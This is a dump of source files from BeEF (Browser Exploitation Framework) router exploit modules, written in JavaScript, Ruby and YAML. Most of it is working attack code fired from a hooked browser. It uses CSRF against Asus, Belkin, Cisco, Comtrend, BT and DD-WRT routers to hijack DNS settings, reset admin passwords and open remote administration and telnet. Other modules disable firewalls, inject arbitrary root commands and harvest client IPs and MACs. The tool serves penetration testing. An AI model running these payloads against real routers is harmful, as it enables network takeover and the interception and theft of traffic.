# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Asus_rt_n12e_get_info < BeEF::Core::Command def self.options [ { 'name' => 'target_ip', 'ui_label' => 'Target Host', 'value' => 'router.asus.com' } ] end def post_execute save({ 'result' => @datastore['result'] }) configuration = BeEF::Core::Configuration.instance return unless configuration.get('beef.extension.network.enable') == true # log the network hosts return unless @datastore['results'] =~ /ip=(.+)&clients=(.+)&wanip=(.+)&netmask=(.+)&gateway=(.+)&dns=(.+)/ ip = Regexp.last_match(1).to_s clients = Regexp.last_match(2).to_s # wanip = Regexp.last_match(3).to_s # netmask = Regexp.last_match(4).to_s gateway = Regexp.last_match(5).to_s dns_servers = Regexp.last_match(6).to_s session_id = @datastore['beefhook'] if !ip.nil? && BeEF::Filters.is_valid_ip?(ip) print_debug("Hooked browser found Asus RT-N12E router [ip: #{ip}]") BeEF::Core::Models::NetworkHost.create(hooked_browser_id: session_id, ip: ip, type: 'Asus RT-N12E Router') BeEF::Core::Models::NetworkService.create(hooked_browser_id: session_id, proto: 'http', ip: ip, port: 80, type: 'HTTP Server') end clients.scan(/([\d.]+,[:\dA-F]{17})/).flatten.each do |client| next if client.nil? next unless client.to_s =~ /^([\d.]+),([:\dA-F]{17})$/ ip = Regexp.last_match(1) mac = Regexp.last_match(2) if BeEF::Filters.is_valid_ip?(ip) print_debug("Hooked browser found router client [ip: #{ip}, mac: #{mac}]") BeEF::Core::Models::NetworkHost.create(hooked_browser_id: session_id, ip: ip, mac: mac) end end if !gateway.nil? && BeEF::Filters.is_valid_ip?(gateway) print_debug("Hooked browser found WAN gateway server [ip: #{gateway}]") BeEF::Core::Models::NetworkHost.create(hooked_browser_id: session_id, ip: gateway, type: 'WAN Gateway') end if !dns_servers.nil? && dns_servers =~ /^([\d. ]+)$/ dns_servers.split(' ').uniq.each do |dns| if BeEF::Filters.is_valid_ip?(dns) print_debug("Hooked browser found DNS server [ip: #{dns}]") BeEF::Core::Models::NetworkHost.create(hooked_browser_id: session_id, ip: dns, type: 'DNS Server') end end end end end
JavaScript
beef/modules/exploits/router/asus_rt_n66u_cmd_exec/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var gateway = '<%= @base %>'; var exec_command = '<%= @exec_command %>'; var timeout = 15; var asus_rt_n66u_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe(); asus_rt_n66u_iframe1_<%= @command_id %>.setAttribute('src',"http://" + gateway +"/apply.cgi?current_page=Main_Netstat_Content.asp&next_page=Main_Netstat_Content.asp&next_host="+gateway+"&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&preferred_lang=EN&SystemCmd="+exec_command+"&firmver=3.0.0.4&cmdMethod=netstat&NetOption=-a&targetip=&ExtOption=-r+state"); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { document.body.removeChild(asus_rt_n66u_iframe1_<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });
YAML
beef/modules/exploits/router/asus_rt_n66u_cmd_exec/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: asus_rt_n66u_cmd_exec: enable: true category: ["Exploits", "Router"] name: "Asus DSL-N66U / RT-N66U cmd exec" description: "Attempts to inject a command against routers Asus RT-N66U / Asus DSL-N66U via CSRF.(Assumes user has logged on)" authors: ["kxynos", "n0x00"] target: working: ["ALL"]
Ruby
beef/modules/exploits/router/asus_rt_n66u_cmd_exec/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Asus_rt_n66u_cmd_exec < BeEF::Core::Command def self.options [ { 'name' => 'base', 'ui_label' => 'Router web root', 'value' => '192.168.100.1' }, { 'name' => 'exec_command', 'ui_label' => 'Command to issue', 'value' => '' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/beetel_bcm96338_router_dns_hijack/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { // config var target = 'http://<%= @rhost %>/dnscfg.cgi'; var dns1 = '<%= @dns1 %>'; var dns2 = '<%= @dns2 %>'; var timeout = 15; // validate DNS server IP addresses if (!beef.net.is_valid_ip(dns1)) { beef.debug('Invalid Primary DNS server IP address was provided'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided"); return; } if (!beef.net.is_valid_ip(dns2)) { beef.debug('Invalid Secondary DNS server IP address was provided'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided"); return; } // change DNS var beetel_bcm96338_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "GET", "application/x-www-form-urlencoded", [ {'type':'hidden', 'name':'dnsPrimary', 'value': dns1}, {'type':'hidden', 'name':'dnsSecondary', 'value': dns2}, {'type':'hidden', 'name':'dnsDynamic', 'value': '0'}, {'type':'hidden', 'name':'dnsRefresh', 'value': '1'} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); // clean up cleanup = function() { document.body.removeChild(beetel_bcm96338_iframe_<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });
YAML
beef/modules/exploits/router/beetel_bcm96338_router_dns_hijack/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # # References: # https://www.exploit-db.com/exploits/42196/ # beef: module: beetel_bcm96338_router_dns_hijack: enable: true category: ["Exploits", "Router"] name: "Beetel BCM96338 Router DNS Hijack" description: "Attempts to change the DNS setting on a Beetel BCM96338 router.<br/><br/>This router reportedly does not require authentication to change the DNS servers.<br/><br/>This module has not been tested." authors: ["Todor Donev"] target: unknown: ["ALL"]
Ruby
beef/modules/exploits/router/beetel_bcm96338_router_dns_hijack/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Beetel_bcm96338_router_dns_hijack < BeEF::Core::Command def self.options [ { 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '192.168.1.1' }, { 'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8' }, { 'name' => 'dns2', 'ui_label' => 'Secondary DNS Server', 'value' => '8.8.4.4' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/belkin_dns_csrf/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { // config var proto = 'http' var rhost = '<%= @rhost %>'; var dns1 = '<%= @dns1 %>'; var dns2 = '<%= @dns2 %>'; var timeout = 15; // validate primary DNS server IP address if (!beef.net.is_valid_ip(dns1)) { beef.debug('Invalid Primary DNS server IP address was provided'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided"); return; } var parts = dns1.split('.'); var dns1_1 = parts[0]; var dns1_2 = parts[1]; var dns1_3 = parts[2]; var dns1_4 = parts[3]; // validate secondary DNS server IP address if (!beef.net.is_valid_ip(dns2)) { beef.debug('Invalid Secondary DNS server IP address was provided'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided"); return; } var parts = dns2.split('.'); var dns2_1 = parts[0]; var dns2_2 = parts[1]; var dns2_3 = parts[2]; var dns2_4 = parts[3]; // attempt auth with default password (admin) // incorrect login attempts do not log out an authenticated session var img = new Image(); img.setAttribute("style", "visibility:hidden"); img.setAttribute("width", "0"); img.setAttribute("height","0"); img.id = 'belkin_auth_<%= @command_id %>'; img.src = proto + '://' + rhost + "/cgi-bin/login.exe?pws=admin"; document.body.appendChild(img); // change DNS var belkin_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(proto + '://' + rhost + '/cgi-bin/setup_dns.exe', "POST", "application/x-www-form-urlencoded", [ {'type':'hidden', 'name':'dns1_1', 'value':dns1_1}, {'type':'hidden', 'name':'dns1_2', 'value':dns1_2}, {'type':'hidden', 'name':'dns1_3', 'value':dns1_3}, {'type':'hidden', 'name':'dns1_4', 'value':dns1_4}, {'type':'hidden', 'name':'dns2_1', 'value':dns2_1}, {'type':'hidden', 'name':'dns2_2', 'value':dns2_2}, {'type':'hidden', 'name':'dns2_3', 'value':dns2_3}, {'type':'hidden', 'name':'dns2_4', 'value':dns2_4}, {'type':'hidden', 'name':'dns2_1_t', 'value':dns2_1}, {'type':'hidden', 'name':'dns2_2_t', 'value':dns2_2}, {'type':'hidden', 'name':'dns2_3_t', 'value':dns2_3}, {'type':'hidden', 'name':'dns2_4_t', 'value':dns2_4}, {'type':'hidden', 'name':'auto_from_isp', 'value':'0'} // disable dns from ISP ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); // clean up cleanup = function() { document.body.removeChild(belkin_iframe_<%= @command_id %>); document.body.removeChild(belkin_auth_<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });
YAML
beef/modules/exploits/router/belkin_dns_csrf/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # # Tested on F1PI242EGau_V1.00.002 and F1PI242EGau_V1.00.009 # beef: module: belkin_dns_csrf: enable: true category: ["Exploits", "Router"] name: "Belkin DNS Hijack CSRF" description: "Attempts to change the DNS setting on a Belkin router.<br/><br/>Multiple models are affected, including F5D7230 and F1PI242EG." authors: ["bcoles"] target: user_notify: ["ALL"]
Ruby
beef/modules/exploits/router/belkin_dns_csrf/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Belkin_dns_csrf < BeEF::Core::Command def self.options [ { 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '10.1.1.1' }, { 'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8' }, { 'name' => 'dns2', 'ui_label' => 'Secondary DNS Server', 'value' => '8.8.4.4' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/bt_home_hub_csrf/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; var timeout = 15; var bt_home_hub_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST", "application/x-www-form-urlencoded", [ {'type':'hidden', 'name':'0', 'value':'31'} , {'type':'hidden', 'name':'1', 'value':''}, {'type':'hidden', 'name':'30', 'value':passwd} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { document.body.removeChild(bt_home_hub_iframe_<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });
YAML
beef/modules/exploits/router/bt_home_hub_csrf/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: bt_home_hub_csrf: enable: true category: ["Exploits", "Router"] name: "BT Home Hub CSRF" description: "Attempts to enable remote administration and change the tech password on a BT Home Hub wireless router." authors: ["bcoles"] target: working: ["ALL"]
Ruby
beef/modules/exploits/router/bt_home_hub_csrf/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Bt_home_hub_csrf < BeEF::Core::Command def self.options [ { 'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.254/' }, { 'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/cisco_e2400_csrf/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; var timeout = 15; var cisco_e2400_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", "application/x-www-form-urlencoded", [ {'type':'hidden', 'name':'submit_button', 'value':'Management'}, {'type':'hidden', 'name':'change_action', 'value':''}, {'type':'hidden', 'name':'action', 'value':'Apply'}, {'type':'hidden', 'name':'PasswdModify', 'value':'0'}, {'type':'hidden', 'name':'http_enable', 'value':'1'}, {'type':'hidden', 'name':'https_enable', 'value':'1'}, {'type':'hidden', 'name':'ctm404_enable', 'value':''}, {'type':'hidden', 'name':'remote_mgt_https', 'value':'1'}, {'type':'hidden', 'name':'wait_time', 'value':'4'}, {'type':'hidden', 'name':'need_reboot', 'value':'0'}, {'type':'hidden', 'name':'http_passwd', 'value':passwd}, {'type':'hidden', 'name':'http_passwdConfirm','value':passwd}, {'type':'hidden', 'name':'_http_enable', 'value':'1'}, {'type':'hidden', 'name':'_https_enable', 'value':'1'}, {'type':'hidden', 'name':'web_wl_filter', 'value':'0'}, {'type':'hidden', 'name':'remote_management', 'value':'1'}, {'type':'hidden', 'name':'_remote_mgt_https', 'value':'1'}, {'type':'hidden', 'name':'remote_upgrade', 'value':'1'}, {'type':'hidden', 'name':'remote_ip_any', 'value':'1'}, {'type':'hidden', 'name':'http_wanport', 'value':'8080'}, {'type':'hidden', 'name':'nf_alg_sip', 'value':'0'}, {'type':'hidden', 'name':'ctf_disable', 'value':'0'}, {'type':'hidden', 'name':'upnp_enable', 'value':'1'}, {'type':'hidden', 'name':'upnp_config', 'value':'0'}, {'type':'hidden', 'name':'upnp_internet_dis', 'value':'0'}, ]); var cisco_e2400_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", "application/x-www-form-urlencoded", [ {'type':'hidden', 'name':'submit_button', 'value':'Firewall'}, {'type':'hidden', 'name':'change_action', 'value':''}, {'type':'hidden', 'name':'action', 'value':'Apply'}, {'type':'hidden', 'name':'block_wan', 'value':'0'}, {'type':'hidden', 'name':'block_loopback', 'value':'0'}, {'type':'hidden', 'name':'multicast_pass', 'value':'1'}, {'type':'hidden', 'name':'ipv6_multicast_pass', 'value':'1'}, {'type':'hidden', 'name':'ident_pass', 'value':'0'}, {'type':'hidden', 'name':'block_cookie', 'value':'0'}, {'type':'hidden', 'name':'block_java', 'value':'0'}, {'type':'hidden', 'name':'block_proxy', 'value':'0'}, {'type':'hidden', 'name':'block_activex', 'value':'0'}, {'type':'hidden', 'name':'wait_time', 'value':'3'}, {'type':'hidden', 'name':'ipv6_filter', 'value':'off'}, {'type':'hidden', 'name':'filter', 'value':'off'} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { document.body.removeChild(cisco_e2400_iframe1_<%= @command_id %>); document.body.removeChild(cisco_e2400_iframe2_<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });
YAML
beef/modules/exploits/router/cisco_e2400_csrf/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: cisco_e2400_csrf: enable: true category: ["Exploits", "Router"] name: "Cisco E2400 CSRF" description: "Attempts to enable remote administration on HTTPS port 443, disable the firewall, and change the password on a Cisco/Linksys E2400 router." authors: ["bcoles", "n0x00"] target: working: ["ALL"]
Ruby
beef/modules/exploits/router/cisco_e2400_csrf/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Cisco_e2400_csrf < BeEF::Core::Command def self.options [ { 'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.100.2/' }, { 'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/comtrend_ct5367_csrf/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; var timeout = 15; var ct5367_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe(); ct5367_iframe1_<%= @command_id %>.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); var ct5367_iframe2_<%= @command_id %> = beef.dom.createInvisibleIframe(); var form = document.createElement('form'); form.setAttribute('action', gateway + "password.cgi"); form.setAttribute('method', 'post'); var input = null; input = document.createElement('input'); input.setAttribute('type', 'hidden'); input.setAttribute('name', 'sptPassword'); input.setAttribute('value', passwd); form.appendChild(input); input = document.createElement('input'); input.setAttribute('type', 'hidden'); input.setAttribute('name', 'usrPassword'); input.setAttribute('value', passwd); form.appendChild(input); input = document.createElement('input'); input.setAttribute('type', 'hidden'); input.setAttribute('name', 'sysPassword'); input.setAttribute('value', passwd); form.appendChild(input); ct5367_iframe2_<%= @command_id %>.contentWindow.document.body.appendChild(form); form.submit(); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { document.body.removeChild(ct5367_iframe1_<%= @command_id %>); document.body.removeChild(ct5367_iframe2_<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });
YAML
beef/modules/exploits/router/comtrend_ct5367_csrf/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: comtrend_ct5367_csrf: enable: true category: ["Exploits", "Router"] name: "Comtrend CT-5367 CSRF" description: "Attempts to enable remote administration and change the password on a Comtrend CT-5367 router." authors: ["bcoles"] target: working: ["ALL"]
Ruby
beef/modules/exploits/router/comtrend_ct5367_csrf/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Comtrend_ct5367_csrf < BeEF::Core::Command def self.options [ { 'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/' }, { 'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/comtrend_ct5624_csrf/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; var timeout = 15; var ct5367_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe(); ct5367_iframe1_<%= @command_id %>.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); var ct5367_iframe2_<%= @command_id %> = beef.dom.createInvisibleIframe(); ct5367_iframe2_<%= @command_id %>.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { document.body.removeChild(ct5367_iframe1_<%= @command_id %>); document.body.removeChild(ct5367_iframe2_<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });
YAML
beef/modules/exploits/router/comtrend_ct5624_csrf/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: comtrend_ct5624_csrf: enable: true category: ["Exploits", "Router"] name: "Comtrend CT-5624 CSRF" description: "Attempts to enable remote administration and change the password on a Comtrend CT-5624 router." authors: ["bcoles"] target: working: ["ALL"]
Ruby
beef/modules/exploits/router/comtrend_ct5624_csrf/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Comtrend_ct5624_csrf < BeEF::Core::Command def self.options [ { 'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/' }, { 'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/comtrend_ct_series_dns_hijack/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { // config var target = 'http://<%= @rhost %>/dnscfg.cgi'; var dns1 = '<%= @dns1 %>'; var dns2 = '<%= @dns2 %>'; var timeout = 15; // validate DNS server IP addresses if (!beef.net.is_valid_ip(dns1)) { beef.debug('Invalid Primary DNS server IP address was provided'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided"); return; } if (!beef.net.is_valid_ip(dns2)) { beef.debug('Invalid Secondary DNS server IP address was provided'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided"); return; } // change DNS var comtrend_ct_series_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "GET", "application/x-www-form-urlencoded", [ {'type':'hidden', 'name':'dnsPrimary', 'value': dns1}, {'type':'hidden', 'name':'dnsSecondary', 'value': dns2}, {'type':'hidden', 'name':'dnsDynamic', 'value': '0'}, {'type':'hidden', 'name':'dnsRefresh', 'value': '1'} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); // clean up cleanup = function() { document.body.removeChild(comtrend_ct_series_iframe_<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });
YAML
beef/modules/exploits/router/comtrend_ct_series_dns_hijack/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # # References: # https://www.exploit-db.com/exploits/40372/ # beef: module: comtrend_ct_series_dns_hijack: enable: true category: ["Exploits", "Router"] name: "Comtrend CT Series Router DNS Hijack" description: "Attempts to change the DNS setting on Comtrend CT-5367 and CT-5624 routers.<br/><br/>These routers reportedly does not require authentication to change the DNS servers.<br/><br/>This module has not been tested." authors: ["Todor Donev"] target: unknown: ["ALL"]
Ruby
beef/modules/exploits/router/comtrend_ct_series_dns_hijack/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Comtrend_ct_series_dns_hijack < BeEF::Core::Command def self.options [ { 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '192.168.1.1' }, { 'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8' }, { 'name' => 'dns2', 'ui_label' => 'Secondary DNS Server', 'value' => '8.8.4.4' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/ddwrt_v24_sp1_cmd_exec/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var host = '<%= @host %>'; var cmd = '<%= @cmd %>'; var path = 'cgi-bin/;'; if (!host.match(/\/$/)) host += '/'; if (cmd.indexOf(' ') != -1) cmd = cmd.replace(/\s+/g, '$IFS'); // Prevent auth dialog by generating the request via a CSS URL instead of an invisible iframe. var ddwrt_div_<%= @command_id %> = document.createElement('div'); ddwrt_div_<%= @command_id %>.setAttribute('style', 'background-image: url("' + host + path + cmd + '")'); document.body.appendChild(ddwrt_div_<%= @command_id %>); beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=exploit attempted'); setTimeout(function() { document.body.removeChild(ddwrt_div_<%= @command_id %>) }, 15 * 1000); });
YAML
beef/modules/exploits/router/ddwrt_v24_sp1_cmd_exec/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: ddwrt_v24_sp1_cmd_exec: enable: true category: ['Exploits', 'Router'] name: 'DD-WRT v24 SP1 Command Execution' description: 'DD-WRT v24 SP1 fails to properly handle metacharacters in the HTTP management interface. This module abuses that flaw by injecting metacharacters to allow an unauthenticated attacker to execute arbitrary commands as the root user.' authors: ['soh_cah_toa'] target: working: ['ALL']
Ruby
beef/modules/exploits/router/ddwrt_v24_sp1_cmd_exec/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Ddwrt_v24_sp1_cmd_exec < BeEF::Core::Command def self.options [ { 'name' => 'host', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/' }, { 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'reboot' } ] end def post_execute save('result' => @datastore['result']) end end
JavaScript
beef/modules/exploits/router/ddwrt_v24_sp1_csrf/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var host = '<%= @host %>'; var password = '<%= @password %>'; var port = '<%= @port %>'; var telnet = '<%= @telnet %>'; var path = 'apply.cgi'; if (!host.match(/\/$/)) host += '/'; var ddwrt_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm( host + path, 'POST', 'application/x-www-form-urlencoded', [ { 'type': 'hidden', 'name': 'submit_button', 'value': 'Management' }, { 'type': 'hidden', 'name': 'action', 'value': 'ApplyTake' }, { 'type': 'hidden', 'name': 'change_action', 'value': '' }, { 'type': 'hidden', 'name': 'submit_type', 'value': '' }, { 'type': 'hidden', 'name': 'commit', 'value': '1' }, { 'type': 'hidden', 'name': 'PasswdModify', 'value': '0' }, { 'type': 'hidden', 'name': 'remote_mgt_https', 'value': '' }, { 'type': 'hidden', 'name': 'http_enable', 'value': '1' }, { 'type': 'hidden', 'name': 'info_passwd', 'value': '0' }, { 'type': 'hidden', 'name': 'https_enable', 'value': '' }, { 'type': 'hidden', 'name': 'http_username', 'value': 'root' }, { 'type': 'hidden', 'name': 'http_passwd', 'value': password }, { 'type': 'hidden', 'name': 'http_passwdConfirm', 'value': password }, { 'type': 'hidden', 'name': '_http_enable', 'value': '1' }, { 'type': 'hidden', 'name': 'refresh_time', 'value': '3' }, { 'type': 'hidden', 'name': 'status_auth', 'value': '1' }, { 'type': 'hidden', 'name': 'maskmac', 'value': '1' }, { 'type': 'hidden', 'name': 'remote_management', 'value': '1' }, { 'type': 'hidden', 'name': 'http_wanport', 'value': port }, { 'type': 'hidden', 'name': 'remote_mgt_telnet', 'value': '1' }, { 'type': 'hidden', 'name': 'telnet_wanport', 'value': telnet }, { 'type': 'hidden', 'name': 'boot_wait', 'value': 'on' }, { 'type': 'hidden', 'name': 'cron_enable', 'value': '1' }, { 'type': 'hidden', 'name': 'cron_jobs', 'value': '' }, { 'type': 'hidden', 'name': 'loopback_enable', 'value': '1' }, { 'type': 'hidden', 'name': 'nas_enable', 'value': '1' }, { 'type': 'hidden', 'name': 'resetbutton_enable', 'value': '1' }, { 'type': 'hidden', 'name': 'zebra_enable', 'value': '1' }, { 'type': 'hidden', 'name': 'ip_conntrack_max', 'value': '512' }, { 'type': 'hidden', 'name': 'ip_conntrack_tcp_timeouts', 'value': '3600' }, { 'type': 'hidden', 'name': 'ip_conntrack_udp_timeouts', 'value': '120' }, { 'type': 'hidden', 'name': 'overclocking', 'value': '200' } ]); beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=exploit attempted'); setTimeout(function() { document.body.removeChild(ddwrt_iframe_<%= @command_id %>) }, 15 * 1000); });
YAML
beef/modules/exploits/router/ddwrt_v24_sp1_csrf/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: ddwrt_v24_sp1_csrf: enable: true category: ['Exploits', 'Router'] name: 'DD-WRT v24 SP1 CSRF' description: 'Abuses a CSRF vulnerability in DD-WRT v24 SP1 to enable remote administration with a new root password.' authors: ['soh_cah_toa'] target: working: ['ALL']
Ruby
beef/modules/exploits/router/ddwrt_v24_sp1_csrf/module.rb
